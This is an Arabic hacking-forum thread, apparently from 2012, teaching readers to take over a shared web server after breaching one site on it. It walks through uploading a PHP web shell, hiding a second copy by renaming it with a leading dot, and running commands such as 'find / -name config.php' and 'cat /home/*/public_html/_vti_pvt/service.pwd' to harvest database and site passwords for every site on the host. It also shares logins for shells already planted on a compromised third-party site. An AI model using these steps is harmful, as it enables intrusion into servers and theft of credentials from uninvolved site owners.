مـــنــــتــــدى افـاعـــي الــهــــكـــــر
اهلا وسهلا بكم في منتدى افاعي الهكر

ارجو التسجيل في المنتدى كي يظهر لكم الاقسام المحجوبة عن الزوار

المنتدى معروض للبيع للراغبين الاتصال على الرقم التالي 0097252316678
مـــنــــتــــدى افـاعـــي الــهــــكـــــر
اهلا وسهلا بكم في منتدى افاعي الهكر

ارجو التسجيل في المنتدى كي يظهر لكم الاقسام المحجوبة عن الزوار

المنتدى معروض للبيع للراغبين الاتصال على الرقم التالي 0097252316678
مـــنــــتــــدى افـاعـــي الــهــــكـــــر
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

مـــنــــتــــدى افـاعـــي الــهــــكـــــر

عالم الهكر ( الـمـلـك كــوبـــرا )
 
الرئيسيةالبوابةأحدث الصورالتسجيلدخول
محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه Muv50643
محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه EBj87204
أزعيم،، فــيـــس بــوٍوٍوٍك

مـــنــــتــــدى افـاعـــي الــهــــكـــــر  :: قـســـم الـقـرصـنـة والــهــكـر الـفـلـســـطـيـنـي :: منتدى اختراق المواقع و المنتديات
 

 محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه

اذهب الى الأسفل 
2 مشترك
كاتب الموضوعرسالة
محمد الهجني
(( افـعـى الـهـكـر الـــجـــديــد ))
(( افـعـى الـهـكـر الـــجـــديــد ))
محمد الهجني


من الذي دعاك : مكافحه المواقع الاباحيه
الجنس ذكر
الابراج : السرطان عدد الرسائل : 6
تاريخ الميلاد : 11/07/1992
الموقع : www.ejdabya.malware-site.www
البلد / المحافظة : ليبيا/طرابلس/جنزور
نقاط واوسمة نقاط واوسمة : 16
تاريخ التسجيل : 25/12/2012

محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه Empty
مُساهمةموضوع: محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه   محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه I_icon10الثلاثاء ديسمبر 25, 2012 10:22 am
طريقة اختراق السيرفر كاملا

طريقة اختراق السيرفرات ..

نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر..

وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا

قم بتحميل سكربت الشيل بلغة php على جهازك
وهذي وصلة الشيل.. (( متطور )) [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
------------------------------------------------------------------------------
بسم الله نبدأ في الشرح ::--

البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php ))

وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config
للتي على السيرفر..

ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..

ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..

وللتوضيح اكثر..

نفترض انك اخترقت الموقع [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] وقمت بتحميل الــ phpshell
على ملف download
فسيصبح العنوان [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ

في الفراغ هذا سوف نضع فيه اوامر اللينكس..

ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--

يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..

ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي
لاخفاءه نسوي كذا بالطريقة هذي [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] wget
وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..

---------------------------------------------
ندخل الى موضوعنا

والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

وثم نجد كتابة اسمها Command وامامها فراغ

في الفراغ هذا ندخل اوامر الليناسف انا غير مهذبعليه..

وندخل الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..

ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود
((safe mode))
=============---==-- شرح الاوامر --==--==============
الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات

نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))

1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له

اكتب هذا الامر
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))
ونلاحظ ان التي باللون الزهري هي الموقع..

طيب نبي نقرأ الي متكوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
ونلاحظ ان الموقع هو [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] والمنتدى من نوعية phpBB

المهم نبي نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

وثم راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات

روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات
او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup

-------------------------------------------------------
الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..

اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd

وراح يطلع لنا المواقع بالشكل ذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب الان ابي استعرض الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا

cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

وراح يجينا الباسورد للموقع ومشفر بمقياس DES

----------------------------------------------------------
طيب يوجد طريقة اخرى افضل من ذلك

نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_html/_vti_pvt/access.cnf

وراح يجينا الباسوردات لكل المواقع..

ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها ..
او قول لي وانا اعطيك افضلها واغلبها..

وهذه بعض اوامر اللينكس

cat /home/*/public_html/vb/admin/config.php لاحضار باسوردات المنتديات من نوع vb
cat /home/*/public_html/phpbb/config.php لاحضار باسوردات المنتديات من نوع phpBB
cat /home/*/public_html/forum/config.php لاحضار باسوردات المنتديات من نوع asp

وطبعا الباسوردات لقاعدة البيانات

ولاكنك تلاحظ ان الاوامر يوجد فيها علامة نجمه * وهذه تعني احضار الباسورد لكل المواقع..

وهذا سكربت ممتاز..

شباب السكربت لــ Php Shell الي انا نزلته فوق..

الي قلت لكم تحملونه .. هذاك سكربت متطور جدا وجديد وهو بلغة php
الي هو هذا [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


في الحقيقه ماستخدمته ويقولون انه ممتاز جدا جدا ومتطوووووور جدا جدا

ولاكن يوجد سكربت اخر لــ PhpShell وهو لــ php
وفي الحقيقة هو هذا الي استخدمه انا داااائمااا
-----------------------------------------------
للتحميل (( كليك يمين وحفظ الهدف بااسم ))
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الملف يحتوي علي التالي

phpshell.php:
هذا هو السكربت ChangeLog:
هنا سوف تجد بعض الميزات التي اضيفت الي هذا الاصدار
README:
هذا ملف فيه الشرح والتعليمات (( اعتقد ان شرحي افضل منه ))
INSTALL:
هذا الملف يخبرك عن كيفية حماية الphp shell بباسوورد
واخيرا جبت لكم مووقع اخترقه واحد يقاله شبح الليل..
من فريق عمل منتدى الليزر..

منزل لكم شيل على الموقع الي هو مخترقه..

4 شيلات

المهم انا اخذتها من المنتدى وحطيتها هنا عشان تستفيدون وتطبقون الاوامر عليه وتعرفون كيف..

1- الشيل الاول
وهذا رابط شيل قد وجته ووجدت ايضا اليوز وبالباس

اليوزر : lezr

الباسورد : lezr_vb

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
----------------------------------------
2- الشيل الثاني (( ممتاز جدا ))
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

اليوزر : root

لايوجد باسورد بس اكتب اليوزر وثم ادخل على طوول
-----------------------------------
3- الشيل الثالث
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

----------------------------------
4- الشيل الرابع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

الرجوع الى أعلى الصفحة اذهب الى الأسفل
omarID07
(( افـعـى الـهـكـر الـــجـــديــد ))
(( افـعـى الـهـكـر الـــجـــديــد ))
omarID07


من الذي دعاك : جوجل
الجنس ذكر
الابراج : السرطان عدد الرسائل : 9
تاريخ الميلاد : 13/07/1898
الموقع : مكة المكرمة
البلد / المحافظة : الباحة
نقاط واوسمة نقاط واوسمة : 13
تاريخ التسجيل : 11/08/2013

محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه Empty
مُساهمةموضوع: رد: محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه   محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه I_icon10الأحد أغسطس 11, 2013 2:13 pm
البي اتش بي اول رابط مو شغال ليش وهل يبغاله تحميل هذا الملف على الكمبيوتر
الرجوع الى أعلى الصفحة اذهب الى الأسفل
omarID07
(( افـعـى الـهـكـر الـــجـــديــد ))
(( افـعـى الـهـكـر الـــجـــديــد ))
omarID07


من الذي دعاك : جوجل
الجنس ذكر
الابراج : السرطان عدد الرسائل : 9
تاريخ الميلاد : 13/07/1898
الموقع : مكة المكرمة
البلد / المحافظة : الباحة
نقاط واوسمة نقاط واوسمة : 13
تاريخ التسجيل : 11/08/2013

محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه Empty
مُساهمةموضوع: رد: محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه   محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه I_icon10الأحد أغسطس 11, 2013 2:18 pm
البي اتش بي اول رابط مو شغال ليش وهل يبغاله تحميل هذا الملف على الكمبيوتر
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
محمد الهجني اخترق اي سيرفز في العالم مع تحيلت اولاد الهجني جنزور الشعبيه
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» ساعدوني بدي اخترق وايرليس
» محمد الهجني
» محمد الهجني: طريقه ارسال الباتشات الي جهاز الضححيه
» محمد الهجني:طريقة اختراق جهاز الضحية بالميتا ورفع سيرفر بيفروست
» من فضلكم ازاى اخترق هذا المنتدى

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
مـــنــــتــــدى افـاعـــي الــهــــكـــــر  :: قـســـم الـقـرصـنـة والــهــكـر الـفـلـســـطـيـنـي :: منتدى اختراق المواقع و المنتديات-
انتقل الى: